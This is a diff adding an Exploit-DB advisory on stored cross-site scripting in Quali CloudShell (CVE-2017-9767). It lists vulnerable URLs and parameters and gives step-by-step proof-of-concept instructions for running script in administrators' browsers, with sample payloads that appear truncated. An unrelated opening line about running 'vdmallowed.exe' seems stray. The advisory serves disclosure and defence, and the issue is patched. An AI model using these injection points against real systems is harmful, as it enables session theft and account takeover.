+E-DB Note: Make sure to run "vdmallowed.exe" (pre-compiled) inside the subfolder.
diff --git a/platforms/windows/webapps/42453.txt b/platforms/windows/webapps/42453.txt
new file mode 100755
index 000000000..376903ef7
--- /dev/null
+++ b/platforms/windows/webapps/42453.txt
@@ -0,0 +1,96 @@
+# Vulnerability type: Multiple Stored Cross Site Scripting
+# Vendor: Quali
+# Product: CloudShell
+# Affected version: v7.1.0.6508 (Patch 6)
+# Patched version: v8 and up
+# Credit: Benjamin Lee
+# CVE ID: CVE-2017-9767
+
+==========================================================
+
+# Overview
+Quali CloudShell (v7.1.0.6508 Patch 6) is vulnerable to multiple stored XSS vulnerabilities on its platform this can be exploited to execute arbitrary HTML and script code on all users (including administrators) from a low-privileged account.
+
+==========================================================
+
+# Vulnerable URL 1 (Reservation Function)
+/RM/Reservation/ReserveNew
+
+# Vulnerable parameter(s)
+- Name
+- Description
+
+# Sample payload
+'">
+
+# PROOF OF CONCEPT
+- Go to the "Inventory" tab
+- Click on details button on either of the items
+- Click on the reserve button and enter the XSS payload onto the affected parameters
+- Add users to the permitted user list (e.g. admin accounts)
+- Once the user click on the reservation list details, the XSS would be executed
+
+==========================================================
+
+# Vulnerable URL 2 (Environment Function)
+/RM/Topology/Update
+
+# Vulnerable parameter(s)
+- Description
+
+# Sample payload
+'">
+
+# PROOF OF CONCEPT
+- Go to the "Environment" tab
+- Click on item properties button
+- Enter the XSS payload onto the affected parameters
+- Change the owner to another user (e.g. admin accounts)
+- Once the user click on the more info button of the item in the environment tab, the XSS would be executed
+
+==========================================================
+
+# Vulnerable URL 3 (Job Scheduling Function)
+/SnQ/JobTemplate/Edit?jobTemplateId=
+
+# Vulnerable parameter(s)
+- Name
+- Description
+- ExecutionBatches[0].Name
+- ExecutionBatches[0].Description
+- Labels
+
+# Sample payload
+'">
+
+# PROOF OF CONCEPT
+- Go to the "Job Scheduling > Add New Suite" tab
+- Enter the XSS payload onto the affected parameters
+- Once the user view details of this suite, the XSS would be executed
+
+==========================================================
+
+# Vulnerable URL 4 (Resource Template Function)
+/RM/AbstractTemplate/AddOrUpdateAbstractTemplate
+
+# Vulnerable parameter(s)
+- Alias
+- Description
+
+# Sample payload
+'">
+
+# PROOF OF CONCEPT
+- Go to the "Inventory > abstract template > Add New" tab
+- Enter the XSS payload onto the affected parameters
+- Once the user click on the more info button of the item, the XSS would be executed
+
+==========================================================
+
+# Timeline
+- 06/06/2017: Vulnerability found
+- 20/06/2017: Vendor informed
+- 20/06/2017: Vendor responded and acknowledged
+- 16/07/2017: Vendor fixed the issue
+- 12/08/2017: Vendor agreed on public disclosure
+- 14/08/2017: Public disclosure